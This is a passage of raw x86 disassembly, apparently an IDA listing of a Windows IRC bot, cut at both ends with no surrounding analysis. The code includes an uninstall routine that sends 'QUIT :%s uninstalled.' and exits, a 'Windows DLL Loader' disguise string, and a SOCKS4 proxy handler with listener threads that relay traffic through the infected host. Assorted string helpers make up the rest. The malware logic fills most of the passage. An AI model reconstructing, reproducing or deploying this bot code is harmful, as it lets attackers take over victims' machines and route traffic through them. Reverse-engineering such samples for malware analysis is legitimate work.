pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset dword_41EB2C
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call dword_417254 ; WSACleanup
push 0
call dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset dword_41EB2C
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset dword_41EB2C
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call dword_417254 ; WSACleanup
push 0
call dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40732D proc near ; DATA XREF: sub_40764D+145�o
var_16F0 = dword ptr -16F0h
var_16EC = dword ptr -16ECh
var_16E8 = dword ptr -16E8h
var_16E4 = dword ptr -16E4h
var_16E0 = byte ptr -16E0h
var_6E0 = byte ptr -6E0h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_5CF = byte ptr -5CFh
var_5CE = dword ptr -5CEh
var_5C8 = byte ptr -5C8h
var_1C8 = dword ptr -1C8h
var_1BE = byte ptr -1BEh
var_1AE = byte ptr -1AEh
var_1B = byte ptr -1Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_1C8]
mov [ebp+var_5D4], eax
push 0
push 408h
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40738F
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: sub_40732D+5A�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: sub_40732D+60�j
movzx eax, [ebp+var_5D0]
cmp eax, 4
jnz short loc_4073BA
movzx eax, [ebp+var_5CF]
cmp eax, 1
jnz short loc_4073BA
mov [ebp+var_16EC], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: sub_40732D+73�j
; sub_40732D+7F�j
and [ebp+var_16EC], 0
loc_4073C1: ; CODE XREF: sub_40732D+8B�j
mov eax, [ebp+var_16EC]
mov [ebp+var_4], eax
movsx eax, [ebp+var_1BE]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp+var_1BE]
push eax
lea eax, [ebp+var_5C8]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and [ebp+var_4], 0
loc_4073F5: ; CODE XREF: sub_40732D+A6�j
; sub_40732D+C2�j
movsx eax, [ebp+var_1B]
test eax, eax
jz short loc_407456
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_5D4]
call sub_4044F7
pop ecx
pop ecx
cmp [ebp+var_4], 0
jz short loc_407423
mov [ebp+var_16F0], offset byte_41DE30
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_40732D+E8�j
mov [ebp+var_16F0], offset dword_418EEC
loc_40742D: ; CODE XREF: sub_40732D+F4�j
push [ebp+var_16F0]
movzx eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_6E0]
push eax
push offset dword_418EB8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: sub_40732D+CE�j
cmp [ebp+var_4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_40732D+12D�j
push 0Ah
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE]
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE+2]
call dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_5E0], eax
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp [ebp+var_5E0], 0
jnz short loc_407537
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_40732D+1D7�j
mov [ebp+var_5CF], 5Ah
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: sub_40732D+2FD�j
push [ebp+var_5D4]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call dword_417248 ; recv
mov [ebp+var_16E4], eax
cmp [ebp+var_16E4], 0
jz short loc_407597
cmp [ebp+var_16E4], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: sub_40732D+25F�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: sub_40732D+268�j
push [ebp+var_16E4]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: sub_40732D+236�j
; sub_40732D+28C�j
push [ebp+var_5E0]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call dword_417248 ; recv
mov [ebp+var_16E8], eax
cmp [ebp+var_16E8], 0
jz short loc_4075FF
cmp [ebp+var_16E8], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: sub_40732D+2C7�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: sub_40732D+2D0�j
push [ebp+var_16E8]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: sub_40732D+29E�j
; sub_40732D+2F1�j
push 32h
call dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_40732D:loc_407597�j
; sub_40732D+28E�j ...
push [ebp+var_5D4]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: sub_40732D+64�j
; sub_40732D+16E�j ...
leave
retn 4
sub_40732D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40764D proc near ; DATA XREF: sub_4077DD+B4�o
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1BC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jnz short loc_4076A8
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: sub_40764D+46�j
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp+var_1A6]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: sub_40764D+B9�j
; sub_40764D+E1�j ...
push 3E8h
push [ebp+var_1C4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp [ebp+var_1C8], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: sub_40764D+A0�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: sub_40764D+A9�j
cmp [ebp+var_1C8], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: sub_40764D+B7�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_407730
push [ebp+var_1C8]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_40764D+D3�j
mov eax, [ebp+var_1CC]
mov ecx, [ebp+var_1C8]
mov [eax], ecx
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1CC]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_1B6]
push eax
mov eax, [ebp+var_1CC]
add eax, 0Ah
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp+var_1A6]
push eax
mov eax, [ebp+var_1CC]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_1CC]
push offset sub_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push [ebp+var_1CC]
call sub_416B4C ; free
pop ecx
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: sub_40764D+153�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40764D:loc_4076F8�j
push [ebp+var_1C4]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: sub_40764D+56�j
leave
retn 4
sub_40764D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DE30
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset sub_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: sub_4083AD+2F2�p
; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
